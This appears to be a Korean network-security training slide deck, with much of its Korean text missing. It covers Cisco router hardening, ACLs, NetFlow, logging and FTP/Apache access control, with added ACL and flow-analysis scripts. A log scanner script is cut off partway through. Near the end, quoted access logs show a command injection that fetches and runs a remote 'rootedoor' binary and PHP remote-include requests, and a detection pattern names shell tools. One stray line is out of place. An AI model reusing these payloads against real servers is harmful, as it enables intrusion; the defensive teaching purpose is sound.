http://www.kisec.com
# clear arp-cache                        ; clear the ARP cache
# conf t
(conf)# arp 1.1.1.1 00d0.b789.d700       ; static ARP entry
10M 10M 8 100M 800M. (half duplex), (full duplex) collision.
(table fragment) environment | request | response | data exchange: all; environment | request only | response | data exchange: all; operates as
# Sentinel
* forward
netstat
  Local Address     Foreign Address     State
  *:10110           *:*                 LISTEN
  forward:1024      www:22              ESTABLISHED
SSL VPN
IPSec VPN vs SSL VPN
  IPSec VPN - network level
  SSL VPN   - application level
1. password
2. telnet
3. SNMP
4. disable
5.
6.
Router ports: (DB15), (WAN, DB60), (RJ45), AUX (RJ45)
Virtual Terminals: vty 0-4; Auxiliary; TFTP Server; (NMS)
User EXEC Mode (ping..)          Router>
Privileged EXEC Mode             Router#
Global Configuration Mode        Router(config)#
Other Configuration Modes        Router(config-mode)#
Setup Mode
RXBOOT Mode
(Privileged)
Router con0 is now available
Press RETURN to get started.
User Access Verification
Password:
Router>                  (User-mode prompt)
Router> enable
Password:
Router#                  (Privileged-mode prompt)
Router# disable
Router>
Router> exit
Router> ?
Exec commands:
  access-enable   Create a temporary Access-List entry
  atmsig          Execute Atm Signalling Commands
  cd              Change current device
  clear           Reset functions
  connect         Open a terminal connection
  dir             List files on given device
  disable         Turn off privileged commands
  disconnect      Disconnect an existing network connection
  enable          Turn on privileged commands
  exit            Exit from the EXEC
  help            Description of the interactive help system
  lat             Open a lat connection
  lock            Lock the terminal
  login           Log in as a particular user
  logout          Exit from the EXEC
  mrinfo          Request neighbor and version information from a multicast router
 -- More --
Privileged
Router> ena
Password:
Router# ?
Exec commands:
  access-enable    Create a temporary Access-List entry
  access-template  Create a temporary Access-List entry
  appn             Send a command to the APPN subsystem.
  atmsig           Execute Atm Signalling Commands
  bfe              For manual emergency modes setting
  calendar         Manage the hardware calendar
  cd               Change current device
  clear            Reset functions
  clock            Manage the system clock
  cmt              Start or stop FDDI Connection Management functions
  configure        Enter configuration mode
  connect          Open a terminal connection
  copy             Copy configuration or image data
  debug            Debugging functions (see also 'undebug')
  delete           Delete a file
  dir              List files on given device
 -- More --
Context-Sensitive Help
Router# clok
Translating "CLOK"
% Unknown command or computer name, or unable to find computer address
Router# cl?
clear   clock
Router# clock
% Incomplete command.
Router# clock ?
  set   Set the time and date
Router# clock set
% Incomplete command.
Router# clock set ?
  Current Time (hh:mm:ss)
Router# clock set 19:56:00
% Incomplete command.
Router# clock set 19:56:00 ?
  <1-31>   Day of the month
  MONTH    Month of the year
Router# clock set 19:56:00 04 8
                              ^
% Invalid input detected at the '^' marker
Router# clock set 19:56:00 04 August
% Incomplete command.
Router# clock set 19:56:00 04 August ?
  <1993-2035>   Year
Router> $ value for our customers, employees, investors, and partners..
Command-line editing keys:
  <Ctrl><A>  beginning of line        <Ctrl><E>  end of line
  <Esc><B>   back one word            <Esc><F>   forward one word
  <Ctrl><B>  back one character       <Ctrl><F>  forward one character
  <Ctrl><P>  previous command         <Ctrl><N>  next command
Router> show history
Router> terminal history size number-of-lines
show running-config / show startup-config
Router# show running-config
Building configuration...
Current configuration:
!
version 11.2
!
 -- More --
Router# show startup-config
Using 1108 out of 130048 bytes
!
version 11.2
!
hostname router
 -- More --
(IOS 10.3: write terminal = show running-config, show config = show startup-config)
show interface
Router# show interface serial 1
Serial1 is up, line protocol is up
  Hardware is MK5025
  Internet address is 183.8.64.129, subnet mask is 255.255.255.128
  MTU 1500 bytes, BW 56 Kbit, DLY 20000 usec, rely 255/255, load 9/255
  Encapsulation HDLC, loopback not set, keepalive set (10 sec)
  Last input 0:00:00, output 0:00:01, output hang never
  Last clearing of "show interface" counters never
  Output queue 0/40, 0 drops; input queue 0/75, 0 drops
  Five minute input rate 1000 bits/sec, 0 packets/sec
  Five minute output rate 2000 bits/sec, 0 packets/sec
     331885 packets input, 62400237 bytes, 0 no buffer
     Received 230457 broadcasts, 0 runts, 0 giants
     3 input errors, 3 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
     403591 packets output, 66717279 bytes, 0 underruns
     0 output errors, 0 collisions, 8 interface resets, 0 restarts
     45 carrier transitions
IOS show version
RouterA# show version
Cisco Internetwork Operating System Software
IOS (tm) 2500 Software (C2500-JS40-L), Version 11.2(5), RELEASE SOFTWARE (fc1)
Copyright (c) 1986-1997 by cisco Systems, Inc.
Compiled Tue 01-Apr-97 09:12 by ckralik
Image text-base: 0x0303F9A8, data-base: 0x00001000
ROM: System Bootstrap, Version 5.2(8a), RELEASE SOFTWARE
ROM: 3000 Bootstrap Software (IGS-RXBOOT), Version 10.2(8a), RELEASE SOFTWARE (fc1)
RouterA uptime is 1 day, 5 hours, 50 minutes
System restarted by reload
System image file is "flash:c2500-js40-l.112-5.bin", booted via flash
 --More--
cisco 2522 (68030) processor (revision M) with 14336K/2048K bytes of memory.
Processor board ID 05614645, with hardware revision 00000002
Bridging software.
SuperLAT software copyright 1990 by Meridian Technology Corp).
X.25 software, Version 2.0, NET2, BFE and GOSIP compliant.
TN3270 Emulation software (copyright 1994 by TGV Inc).
Basic Rate ISDN software, Version 1.0.
1 Ethernet/IEEE 802.3 interface(s)
2 Serial network interface(s)
8 Low-speed serial(sync/async) network interface(s)
1 ISDN Basic Rate interface(s)
32K bytes of non-volatile configuration memory.
16384K bytes of processor board System flash (Read ONLY)
Configuration register is 0x2102
RouterA#
Cisco Discovery Protocol (CDP): Cisco proprietary data-link protocol, runs below TCP/IP, Novell IPX, AppleTalk and others, over LANs, Frame Relay, ATM and others. CDP is enabled from IOS 10.3.
show cdp neighbor: shows neighbour routers and their IP, IPX, AppleTalk, CLNS, DECnet addresses (#sho cdp). show cdp also reveals the neighbour's IOS version.
CDP show cdp entry
RouterA# show cdp entry RouterB
-------------------------
Device ID: RouterB
Entry address(es):
  IP address: 198.121.200.1
  Novell address: 1002.0000.0c01.1111
Platform: cisco 2522, Capabilities: Router
Interface: Serial1, Port ID (outgoing port): Serial0
Holdtime : 149 sec
Version :
Cisco Internetwork Operating System Software
IOS (tm) 2500 Software (C2500-JS40-L), Version 11.2(5), RELEASE SOFTWARE (fc1)
Copyright (c) 1986-1997 by cisco Systems, Inc.
Compiled Tue 01-Apr-97 09:12 by ckralik
RouterA#

CDP show cdp neighbors
RouterA# show cdp neighbors
Capability Codes: R - Router, T - Trans Bridge, B - Source Route Bridge,
                  S - Switch, H - Host, I - IGMP
Device ID           Local Intrfce   Holdtme   Capability   Platform   Port ID
RouterB.cisco.com   Eth 0           151       R T          2522       Eth 0
RouterB.cisco.com   Ser 0           165       R T          2522       Ser 3
RouterA# show cdp neighbors detail
-------------------------
Device ID: RouterB
Entry address(es):
  IP address: 198.121.200.1
  Novell address: 1002.0000.0c01.1111
Platform: cisco 2522, Capabilities: Router
Interface: Serial1, Port ID (outgoing port): Serial0
Holdtime : 149 sec
Cisco IOS
Startup
Router# show startup-config    (show config)*
Router# show running-config    (write term)*
Router# erase startup-config   (write erase)*
Router# reload
Router# setup
* IOS 10.3 form
setup
# setup
--- System Configuration Dialog ---
At any point you may enter a question mark '?' for help.
Use ctrl-c to abort configuration dialog at any prompt.
Default settings are in square brackets '[]'.
Continue with configuration dialog? [yes]:
First, would you like to see the current interface summary? [yes]:
Interface    IP-Address   OK?   Method    Status   Protocol
TokenRing0   unassigned   NO    not set   down     down
Ethernet0    unassigned   NO    not set   down     down
Serial0      unassigned   NO    not set   down     down
Fddi0        unassigned   NO    not set   down     down

Setup
Configuring global parameters:
Enter host name [Router]:
The enable secret is a one-way cryptographic secret used instead of the enable password when it exists.
Enter enable secret [<Use current secret>]:
Enter enable password [san-fran]:
% Please choose a password that is different from the enable secret
Enter enable password [san-fran]:
Enter virtual terminal password [san-fran]:
Configure SNMP Network Management? [no]:
Configure IP? [yes]:
Configure IGRP routing? [yes]:
Your IGRP autonomous system number [1]: 200
Configure DECnet? [no]:
Configure XNS? [no]:
Configure Novell? [no]: yes
Configure Apollo? [no]:
Configure AppleTalk? [no]: yes
Multizone networks? [no]: yes
Configure Vines? [no]:
Configure bridging? [no]:

Setup
Configuring interface parameters:
Configuring interface TokenRing0:
Is this interface in use? [yes]:
Tokenring ring speed (4 or 16)? [16]:
Configure IP on this interface? [no]: yes
IP address for this interface: 172.16.92.67
Number of bits in subnet field [0]:
Class B network is 172.16.0.0, 0 subnet bits; mask is 255.255.0.0
Configure Novell on this interface? [no]: yes
Novell network number [1]:
Configuring interface Serial0:
Is this interface in use? [yes]:
Configure IP on this interface? [yes]:
Configure IP unnumbered on this interface? [no]:
IP address for this interface: 172.16.97.67
Number of bits in subnet field [0]:
Class B network is 172.16.0.0, 0 subnet bits; mask is 255.255.0.0
Configure Novell on this interface? [yes]: no
Configuring interface Serial1:
Is this interface in use? [yes]: no
Setup
The following configuration command script was created:
hostname router
enable secret 5 $1$g722$dg2UVvWG6eekNRTE5LfmM/
enable password san-fran
line vty 0 4
password san-fran
snmp-server community
!
ip routing
no decnet routing
no xns routing
novell routing
no apollo routing
appletalk routing
no clns routing
no vines
no bridge
no mop enabled
 -- More --
!
interface TokenRing0
ip address 172.16.92.67 255.255.0.0
novell network 1
no mop enabled
!
interface Serial0
ip address 172.16.97.67 255.255.0.0
!
interface Serial1
shutdown
!
router igrp 200
network 172.16.0.0
!
end
Use this configuration? [yes/no]: yes
[OK]
Use the enabled mode 'configure' command to modify this configuration.
-> NVRAM
Configuration File (Cisco IOS)
IOS 11.0 commands:
  configure terminal
  show running-config
  show startup-config
  erase startup-config                 (NVRAM)
  configure memory
  copy running-config startup-config   (RAM -> NVRAM)
  copy tftp startup-config
  copy tftp running-config
  copy running-config tftp             (TFTP Server, IP only)
  (bit bucket)
TFTP
tokyo# copy running-config tftp
Remote host []? 131.108.2.155
Name of configuration file to write [tokyo-confg]? tokyo.2
Write file tokyo.2 to 131.108.2.155? [confirm] y
Writing tokyo.2 !!!!!!!! [OK]
tokyo#
(RAM -> TFTP, file tokyo.2)

Router# copy tftp running-config
Host or network configuration file [host]?
IP address of remote host [255.255.255.255]? 131.108.2.155
Name of configuration file [Router-confg]? tokyo.2
Configure using tokyo.2 from 131.108.2.155? [confirm] y
Booting tokyo.2 from 131.108.2.155: !! [OK - 874/16000 bytes]
tokyo#
(TFTP -> RAM)
IOS 11.0 (NVRAM -> RAM)
Router# configure memory
[OK]
Router#
(erase NVRAM)
Router# write erase
[OK]
Router#
(RAM -> NVRAM)
Router# write memory
Router#
Router# show configuration
Using 5057 out of 32768 bytes
!
enable-password san-fran
!
interface Ethernet 0
ip address 131.108.100.5 255.255.255.0
!
 -- More --
(NVRAM, bit bucket, RAM, Terminal)
Configuration (Global Configuration mode)
Router# config term
Router(config)#  : : :
Router(config)# (commands)
Router(config)# exit
Router#

Router# config term
Router(config)# router protocol
Router(config-router)#  : : :
Router(config-router)# (commands)
Router(config-router)# exit
Router(config)# interface type port
Router(config-if)#  : : :
Router(config-if)# (commands)
Router(config-if)# exit
Router(config)# exit
Router#

Interface configuration
Router(config)# interface type port
Router(config)# interface type slot/port
  type: serial, ethernet, tokenring, fddi, hssi, loopback, dialer, null, async, atm, bri, tunnel.
Router(config-if)# shutdown
Router(config-if)# no shutdown
Router(config-if)# exit
Router(config)# interface type number.subinterface   (physical / virtual)
IOS 11.x Configuration
Router# show running-config ?
Router# copy running-config startup-config
Router# copy running-config tftp
Router(config)# no ...
Router# config mem
Router# copy tftp running-config
Router# show startup-config
Router# erase startup-config
Router# reload

ID
Router(config)# hostname Tokyo
Tokyo#
Tokyo(config)# banner motd # Welcome to router Tokyo Accounting Department 3rd Floor #
Tokyo(config)# interface e 0
Tokyo(config-if)# description Engineering LAN, Bldg. 18
password
access-list
standard access-list
extended access-list
access-list / acl
Access-list
access-list 10 permit host 211.1.2.3
access-list 10 permit host 211.1.2.4
access-list 10 deny any
line vty 0 4
 access-class 10 in
 exec-timeout 5 0
 password 7 09581B031200032F064G173W2E25
 login local
* access-class
- telnet listener disable
line vty 0 4
 transport input none
- console
line con 0
 login local
 exec-timeout 2 0     // console timeout: 2 minutes 0 seconds
- telnet
Switch> (enable) set ip permit enable
Switch> (enable) set ip permit 211.1.1.1 telnet
- SNMP
Switch> (enable) set ip permit 211.1.1.1 snmp
- all
Switch> (enable) set ip permit 211.1.1.1 all
1. Default community string: public -> x27swf3
2. SNMP (udp/161)
   snmp-server community x27swf3 ro 11
   snmp-server contact antihong@tt.co.kr
   access-list 11 permit host 211.1.2.5
   access-list 11 deny any
3. snmp disable: no snmp-server
4. v3 (mrtg X)
SNMP on *NIX (snmpd.conf): com2sec mynetwork 211.0.0.1 x27swf3
Windows snmp: SNMP brute force
# conf t
(config)# no service udp-small-servers
(config)# no service tcp-small-servers
(config)# no service finger
(config)# no service pad            x.25
(config)# no ip bootp server
(config)# no ip http server
(config)# no tftp-server
(config)# no ip source-route        ip spoofing: source-route disable
(config)# no cdp run
# set cdp disable                   CatOS
Interface
(config)# int serial0
(config-if)# no ip redirects
(config-if)# no ip directed-broadcast
(config-if)# no ip proxy-arp
(config-if)# no ip unreachables
unused interface shutdown!!
(config)# interface eth0/3
(config-if)# shutdown
interface Serial0
 ip access-group 101 in
access-list 101 deny ip host 0.0.0.0 any
access-list 101 deny ip 127.0.0.0 0.255.255.255 any
access-list 101 deny ip 10.0.0.0 0.255.255.255 any
access-list 101 deny ip 172.16.0.0 0.15.255.255 any
access-list 101 deny ip 192.0.2.0 0.0.0.255 any
access-list 101 deny ip 169.254.0.0 0.0.255.255 any
access-list 101 deny ip 192.168.0.0 0.0.255.255 any
access-list 101 deny ip 240.0.0.0 15.255.255.255 any
access-list 101 deny udp any any eq 1433
access-list 101 deny ip 211.1.1.0 0.0.0.255 any
access-list 101 deny ip 211.1.2.0 0.0.0.255 any
access-list 101 permit ip any any
(inbound IP filter; IP address space: http://www.iana.org/assignments/ipv4-address-space)
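To check what the inbound ACL above actually admits before deploying it, here is an added evaluator (not code from the original slides) that parses Cisco-style `access-list` lines, applies wildcard masks (a 1 bit means "don't care") with first-match semantics and an implicit deny, and can be fed candidate source/destination pairs. The ACL text is copied from the slide; everything else is assumed.

```python
# Added example: evaluate a Cisco-style IP ACL (standard/extended syntax subset)
# against candidate packets. Not part of the original slide deck.
import ipaddress

# The inbound ACL from the slide, reproduced as a constructed input string.
ACL_TEXT = """
access-list 101 deny ip host 0.0.0.0 any
access-list 101 deny ip 127.0.0.0 0.255.255.255 any
access-list 101 deny ip 10.0.0.0 0.255.255.255 any
access-list 101 deny ip 172.16.0.0 0.15.255.255 any
access-list 101 deny ip 192.0.2.0 0.0.0.255 any
access-list 101 deny ip 169.254.0.0 0.0.255.255 any
access-list 101 deny ip 192.168.0.0 0.0.255.255 any
access-list 101 deny ip 240.0.0.0 15.255.255.255 any
access-list 101 deny udp any any eq 1433
access-list 101 deny ip 211.1.1.0 0.0.0.255 any
access-list 101 deny ip 211.1.2.0 0.0.0.255 any
access-list 101 permit ip any any
"""

ALL_ONES = 0xFFFFFFFF


def _parse_addr(tokens):
    """Consume one address spec: 'any', 'host A', or 'A WILDCARD'.
    Returns ((network_bits, care_mask), remaining_tokens)."""
    if tokens[0] == "any":
        return (0, 0), tokens[1:]
    if tokens[0] == "host":
        return (int(ipaddress.IPv4Address(tokens[1])), ALL_ONES), tokens[2:]
    addr = int(ipaddress.IPv4Address(tokens[0]))
    wildcard = int(ipaddress.IPv4Address(tokens[1]))
    care = wildcard ^ ALL_ONES  # wildcard is an inverted netmask
    return (addr & care, care), tokens[2:]


def parse_acl(text):
    """Parse 'access-list N permit|deny PROTO SRC DST [eq PORT]' lines."""
    entries = []
    for line in text.strip().splitlines():
        t = line.split()
        if len(t) < 5 or t[0] != "access-list":
            continue
        action, proto = t[2], t[3]
        src, rest = _parse_addr(t[4:])
        dst, rest = _parse_addr(rest)
        port = int(rest[1]) if len(rest) >= 2 and rest[0] == "eq" else None
        entries.append((action, proto, src, dst, port))
    return entries


def _match(spec, ip_int):
    net, care = spec
    return (ip_int & care) == net


def evaluate(entries, src, dst, proto="tcp", dport=None):
    """First matching entry decides; an ACL with no match denies implicitly."""
    s = int(ipaddress.IPv4Address(src))
    d = int(ipaddress.IPv4Address(dst))
    for action, p, sspec, dspec, port in entries:
        if p != "ip" and p != proto:
            continue
        if port is not None and port != dport:
            continue
        if _match(sspec, s) and _match(dspec, d):
            return action
    return "deny"


ACL = parse_acl(ACL_TEXT)

if __name__ == "__main__":
    # Spoofed internal source arriving on the outside interface: must be denied.
    print(evaluate(ACL, "211.1.2.9", "211.1.1.5"))
    # Ordinary external source: permitted by the final entry.
    print(evaluate(ACL, "8.8.8.8", "211.1.1.5"))
```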
interface Serial0
 ip access-group 110 out
access-list 110 permit ip 211.1.1.0 0.0.0.255 any
access-list 110 permit ip 211.1.2.0 0.0.0.255 any
access-list 110 deny ip any any log
* log
* log-input (increases some CPU load)
SLOT 5:*May 17 20:06:46: %SEC-6-IPACCESSLOGDP: list 110 denied icmp 10.1.1.2 (GigabitEthernet0 ) -> 61.182.3.158 (0/0), 2 packets
(outgoing IP filter)
Null route (black hole)
interface Null0
 no ip unreachables
!
ip route <dest to drop> <mask> Null0

interface Null0
 no ip unreachables
!
ip route 211.1.1.1 255.255.255.255 Null0
(lower CPU cost than an ACL)
CatOS> (enable) set port security 3/1 enable
CatOS> (enable) set port security 3/1 enable 01-02-03-04-05-06
CatOS> (enable) set port security 3/21 enable age 10 maximum 5 violation shutdown
  : 2003 May 03 15:40:32 %SECURITY-1-PORTSHUTDOWN: Port 3/21 shutdown due to no space
CatOS> (enable) set cam static filter 00-02-03-04-05-06 1     (MAC filter)
CatOS> (enable) set port broadcast <mod/port> 0.01%           (broadcast storm control)
IP Accounting (per source/destination IP; performance impact!!!)
ROUTER# conf t
ROUTER(config)# int serial0
ROUTER(config-if)# ip accounting
ROUTER(config-if)# exit
ROUTER# sh ip accounting
  Source           Destination       Packets   Bytes
  192.168.65.75    210.145.255.74    1         75
  192.168.65.103   66.77.73.150      7         6136
  192.168.66.35    210.196.133.2     1         109
CIPAF: http://cipaf.sourceforge.net/
NetFlow
ROUTER# conf t
ROUTER(config)# ip flow-export version 5 peer-as
ROUTER(config)# ip flow-export destination 211.0.0.1 2055
ROUTER(config)# int serial0
ROUTER(config-if)# ip route-cache flow
ROUTER(config-if)# exit
ROUTER# sh ip cache flow
Protocol    Total    Flows   Packets   Bytes   Packets   Active(Sec)   Idle(Sec)
--------    Flows    /Sec    /Flow     /Pkt    /Sec      /Flow         /Flow
TCP-WWW     716      0.0     9         84      0.1       4.1           2.1
TCP-SMTP    71       0.0     30        996     0.0       8.0           3.2
TCP-other   37       0.0     4         70      0.0       3.0           3.8
UDP-DNS     118      0.0     1         63      0.0       1.2           10.1
UDP-other   68       0.0     1         173     0.0       0.3           10.8
ICMP        5        0.0     1         67      0.0       0.0           11.9
Total:      1015     0.0     9         294     0.2       3.7           3.8

NetFlow
src              dest              pr   src port   des port
203.254.149.28   134.111.200.231   06   0401       0089
203.254.149.28   134.111.200.232   06   0402       0089
203.254.149.28   134.111.200.233   06   0403       0089
203.254.149.28   134.111.200.234   06   0404       0089
Protocol : 06 = 0*16^1 + 6*16^0 = 6 (tcp)
Port     : 0089 = 16^3*0 + 16^2*0 + 16^1*8 + 16^0*9 = 137
# show ip cache flow | include 0089     (port 137)
http://moran.kaist.ac.kr/
2005/04/06 15:34:06 210.183.99.253.59619 -> 221.139.0.112.1433 6 5 380
2005/04/06 15:34:07 210.183.99.253.60814 -> 221.139.0.55.1433 6 5 378
2005/04/06 15:34:07 210.183.99.253.60580 -> 221.139.0.90.1433 6 5 378
2005/04/06 15:34:03 210.183.99.253.57012 -> 221.139.0.55.1433 6 5 378
2005/04/06 15:34:06 210.183.99.253.59524 -> 221.139.0.49.1433 6 5 378
2005/04/06 15:34:06 210.183.99.253.59438 -> 221.139.0.49.1433 6 4 338
2005/04/06 15:34:03 210.183.99.253.57065 -> 221.139.0.133.1433 6 4 348
2005/04/06 15:34:05 210.183.99.253.58523 -> 221.139.0.62.1433 6 5 378
2005/04/06 15:34:06 210.183.99.253.59872 -> 221.139.0.17.1433 6 5 378
2005/04/06 15:34:05 210.183.99.253.59066 -> 221.139.0.133.1433 6 5 388
2005/04/06 15:34:07 210.183.99.253.60325 -> 221.139.0.49.1433 6 5 378
2005/04/06 15:34:06 210.183.99.253.59799 -> 221.139.0.17.1433 6 5 378
2005/04/06 15:34:04 210.183.99.253.57619 -> 221.139.0.17.1433 6 5 378
2005/04/06 15:34:05 210.183.99.253.58930 -> 221.139.0.133.1433 6 5 388
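Both flow captures above (the hex-port table with tcp/137 and the text records with tcp/1433) show the same thing a defender wants to catch: one source fanning out to many destinations on a single port. The added script below (not from the original slides) parses both record layouts as they appear on the page, normalises them, and flags such fan-out; the sample records are constructed and the layouts are assumed from what is shown.

```python
# Added example: normalise the two flow-record layouts shown on the slides and
# report (src, proto, dport) groups that reach many distinct destinations.
# Not part of the original slide deck.
from collections import defaultdict

# Constructed sample in the "src dst pr sport dport" layout (hex fields).
HEX_RECORDS = """
203.254.149.28 134.111.200.231 06 0401 0089
203.254.149.28 134.111.200.232 06 0402 0089
203.254.149.28 134.111.200.233 06 0403 0089
203.254.149.28 134.111.200.234 06 0404 0089
"""

# Constructed sample in the "date time src.sport -> dst.dport proto pkts bytes"
# layout; the last line is a single SMTP flow that must not be flagged.
TEXT_RECORDS = """
2005/04/06 15:34:06 210.183.99.253.59619 -> 221.139.0.112.1433 6 5 380
2005/04/06 15:34:07 210.183.99.253.60814 -> 221.139.0.55.1433 6 5 378
2005/04/06 15:34:07 210.183.99.253.60580 -> 221.139.0.90.1433 6 5 378
2005/04/06 15:34:06 210.183.99.253.59524 -> 221.139.0.49.1433 6 5 378
2005/04/06 15:34:03 210.183.99.253.57065 -> 221.139.0.133.1433 6 4 348
2005/04/06 15:34:06 210.183.99.253.59872 -> 221.139.0.17.1433 6 5 378
2005/04/06 15:34:05 210.183.99.253.58523 -> 221.139.0.62.1433 6 5 378
2005/04/06 15:34:09 210.183.99.253.58601 -> 221.139.0.7.25 6 5 378
"""

PROTO_NAMES = {1: "icmp", 6: "tcp", 17: "udp"}


def split_host_port(token):
    """'221.139.0.112.1433' -> ('221.139.0.112', 1433); the port is the last dotted field."""
    host, _, port = token.rpartition(".")
    return host, int(port)


def parse_hex_record(line):
    """Hex layout: protocol and ports are hexadecimal, e.g. 0089 -> 137."""
    src, dst, pr, sport, dport = line.split()
    return {"src": src, "dst": dst, "proto": int(pr, 16),
            "sport": int(sport, 16), "dport": int(dport, 16)}


def parse_text_record(line):
    """Text layout: decimal protocol with packet and byte counts appended."""
    f = line.split()
    src, sport = split_host_port(f[2])
    dst, dport = split_host_port(f[4])
    return {"src": src, "dst": dst, "proto": int(f[5]), "sport": sport,
            "dport": dport, "packets": int(f[6]), "bytes": int(f[7])}


def parse_all(text, parser):
    return [parser(l) for l in text.strip().splitlines() if l.strip()]


def find_fanout(records, min_targets):
    """Group flows by (src, proto name, dport) and return the groups whose
    number of distinct destinations reaches min_targets."""
    targets = defaultdict(set)
    for r in records:
        proto = PROTO_NAMES.get(r["proto"], str(r["proto"]))
        targets[(r["src"], proto, r["dport"])].add(r["dst"])
    return {key: len(dsts) for key, dsts in targets.items() if len(dsts) >= min_targets}


if __name__ == "__main__":
    print(find_fanout(parse_all(HEX_RECORDS, parse_hex_record), 4))
    print(find_fanout(parse_all(TEXT_RECORDS, parse_text_record), 5))
```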
Rate-limit
** rate-limit {input | output} bps burst-normal burst-max conform-action action exceed-action action
   burst-normal :
   burst-max :
   conform-action : (transmit)
   exceed-action : (drop)
   burst-normal = (bps/8) * 1.5
   burst-max    = (bps/8) * 2
** typical traffic mix
   > TCP  : ~90 % (HTTP, FTP and P2P tools)
   > UDP  : ~10 % (DNS, SNMP, streaming)
   > ICMP : <1 %

Rate-limit
int serial 0
 rate-limit input access-group 150 2000000 250000 250000 conform-action transmit exceed-action drop
 rate-limit input access-group 160 512000 8000 8000 conform-action transmit exceed-action drop
 rate-limit output access-group 150 2000000 250000 250000 conform-action transmit exceed-action drop
 rate-limit output access-group 151 1000000 250000 250000 conform-action transmit exceed-action drop
 rate-limit output 19000000 3562500 4750000 conform-action transmit exceed-action drop
access-list 150 permit udp any any
access-list 151 permit ip host 211.0.0.1 any
access-list 160 permit icmp any any echo-reply
Logging
(1) console logging (2) terminal line logging (3) buffered logging (4) snmp trap logging (5) ACL violation logging (6) syslog logging (best way!!)
Router# config t
(config)# logging trap information
(config)# logging 14.2.9.6
(config)# logging facility local6
(config)# logging source-interface loopback0
/etc/syslog.conf on the syslog host (udp 514 must be open!!):
local6.debug    /var/log/routers.log
show clock detail
show version
show running-config
show startup-config
show reload
show ip route
show ip arp
show users
show logging
show ip interface
show interfaces
show tcp brief all
show ip sockets
show ip cache flow
show ip cef
show snmp user
show snmp group
show clock detail
ftp
proftpd : http://www.proftpd.org/
- wu-ftpd
- xinetd / standalone
ftp accounts: /etc/passwd, /etc/shadow; /etc/ftpusers (denied ids); /etc/shells (RequireValidShell off ..)

(proftpd.conf)
ServerType standalone        (or inetd)
DefaultRoot ~ !system
User nobody
Group nobody
ServerIdent On "Welcome to FTP"
MaxClients
MaxClientsPerHost 3 "Sorry, you may not connect more than one time."
MaxHostsPerUser 1 "Sorry, you may not connect more than 1 IP."

limit command
<Limit command> ... </Limit>
command :
  CWD, MKD, RNFR, RNTO, DELE, RMD, RETR, STOR
  READ  : FTP read
  DIRS  :
  LOGIN :
  WRITE : FTP write
  ALL   : all FTP commands

limit command (example)
<Anonymous ~ftp>
  ...
  <Limit LOGIN>
    AllowAll
  </Limit>
  <Limit WRITE>
    DenyAll
  </Limit>
  <Directory incoming>
    <Limit STOR MKD>
      AllowAll
    </Limit>
  </Directory>
</Anonymous>

<Limit LOGIN>
  Order deny,allow
  Deny from 192.168.1.
  Allow from all
</Limit>

<Limit LOGIN>
  AllowUser user1
  AllowUser test2
  AllowGroup normal
  DenyAll
</Limit>
1. SMTP relay
2. sendmail.cf
3.
: (1) IP (2)
<VirtualHost secret.abc.co.kr>
  DocumentRoot /usr/local/apache/htdocs/secret/
  ServerName secret.abc.co.kr
  <Location /secret.html>
    order deny,allow
    deny from all
    allow from 192.168.1.1
  </Location>
</VirtualHost>
http://secret.abc.co.kr/secret.html is reachable only from 192.168.1.1

<VirtualHost secret.abc.co.kr>
  DocumentRoot /usr/local/apache/htdocs/secret/
  ServerName secret.abc.co.kr
  <Files secret.html>
    AuthName "ID/PW."
    AuthType Basic
    AuthUserFile /usr/local/apache/htdocs/.htpasswd
    Require valid-user
  </Files>
</VirtualHost>
.htpasswd holds the id/pw
technote ( )
201.9.xxx.xxx - - [28/Oct/2004:10:59:45 +0900] "GET /cgi/b/t/board/main.cgi?board=free_board&command=xxxx_xxxx&xxxxxx=wget%20-P%20/tmp%20http://xxx.xxxxx.com/cavaleirosb1/xpl/rootedoor HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
201.9.xxx.xxx - - [28/Oct/2004:11:00:10 +0900] "GET /cgi/b/t/board/main.cgi?board=free_board&command=xxxx_xxxx&xxxxxx=cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20/tmp;chmod%20777%20rootedoor;./rootedoor HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
( ) php.ini: allow_url_fopen = Off
200.103.32.152 - - [14/Feb/2005:08:26:06 +0900] "GET /bbs//include/write.php?dir=http://www.xxx.xxx.br/contador/cmd?&cmd=id HTTP/1.0" 200 0
219.116.94.139 - - [14/Feb/2005:09:54:38 +0900] "GET http://xxx.xxx.xxx.kr/bbs//include/write.php?dir=http://www.xxx.xxx.br/cmd.txt?&cmd=ver HTTP/1.0" 200 0
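The two log patterns above (a board CGI parameter carrying shell commands, and a PHP include parameter pointing at a remote URL) can be picked out of an Apache access log automatically. The added script below is not from the original slides: it parses combined-log lines, decodes each query parameter, and reports which parameter looks like a remote include or a command string; the sample lines are constructed after the ones shown, with placeholder addresses.

```python
# Added example: flag remote-file-include and command-injection attempts in
# Apache access-log lines of the kind shown on the slide. Not part of the slides.
import re
from urllib.parse import unquote_plus

# Constructed log lines modelled on the slide (addresses and hosts are placeholders).
LOG_LINES = [
    '201.9.0.1 - - [28/Oct/2004:10:59:45 +0900] "GET /cgi/b/t/board/main.cgi?board=free_board'
    '&command=xxxx_xxxx&xxxxxx=wget%20-P%20/tmp%20http://xxx.xxxxx.com/xpl/rootedoor HTTP/1.1" '
    '200 5 "-" "Mozilla/4.0"',
    '201.9.0.1 - - [28/Oct/2004:11:00:10 +0900] "GET /cgi/b/t/board/main.cgi?board=free_board'
    '&command=xxxx_xxxx&xxxxxx=cd%20..;cd%20..;cd%20/tmp;chmod%20777%20rootedoor;./rootedoor '
    'HTTP/1.1" 200 5 "-" "Mozilla/4.0"',
    '200.103.32.152 - - [14/Feb/2005:08:26:06 +0900] "GET /bbs//include/write.php'
    '?dir=http://www.xxx.xxx.br/contador/cmd?&cmd=id HTTP/1.0" 200 0',
    '10.0.0.5 - - [14/Feb/2005:09:00:00 +0900] "GET /bbs/index.php?page=2 HTTP/1.0" '
    '200 4096 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})'
)
# Shell command names at the start of a value or after a separator.
SHELL_RE = re.compile(r'(^|[;&|\s])(wget|curl|chmod|sh|bash|perl|cd)(\s|$)')
REMOTE_RE = re.compile(r'^\s*(https?|ftp)://', re.I)


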